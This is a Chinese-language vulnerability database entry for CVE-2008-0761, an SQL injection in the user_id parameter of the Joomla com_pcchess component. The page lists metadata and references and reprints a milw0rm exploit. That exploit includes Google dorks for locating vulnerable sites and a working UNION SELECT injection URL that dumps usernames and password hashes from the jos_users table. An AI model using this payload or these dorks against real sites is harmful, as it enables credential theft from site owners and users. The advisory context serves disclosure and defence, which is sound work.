Prince Clan Chess Club com_pcchess 组件 'user_id' 参数 SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114548 漏洞类型 SQL注入
发布时间 2008-02-12 更新时间 2009-01-23
CVE编号 CVE-2008-0761 CNNVD-ID CNNVD-200802-261
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5104
https://www.securityfocus.com/bid/27761
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-261
|漏洞详情
Joomla!PrinceClanChessClub(com_pcchess)组件的index.php存在SQL注入漏洞。远程攻击者可以借助players操作中的user_id参数执行任意的SQL指令。
|漏洞EXP
#########################################################################
#
# joomla SQL Injection(com_pcchess)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl: com_pcchess "user_id"
#
# DORK 2 : allinurl: com_pcchess
#
#########################################################################
EXPLOIT :

index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

#########################################################################
# S@BUN    i AM NOT HACKER    S@BUN
#########################################################################

<mosinstall type="component">
 <name>pcchess</name>
 <creationDate>08/20/2005</creationDate>
 <author>Robert Prince</author>
 <copyright>This component copyright Robert J. Prince, released under the GNU/GPL License</copyright>
 <authorEmail>rob@princeclan.org</authorEmail>

 <authorUrl>www.princeclan.org</authorUrl>
 <version>0.8</version>

# milw0rm.com [2008-02-12]
|受影响的产品
Prince Clan Chess Club 0.8
|参考资料

来源:MILW0RM
名称:5104
链接:http://www.milw0rm.com/exploits/5104
来源:XF
名称:pcchessclub-index-sql-injection(40436)
链接:http://xforce.iss.net/xforce/xfdb/40436
来源:BID
名称:27761
链接:http://www.securityfocus.com/bid/27761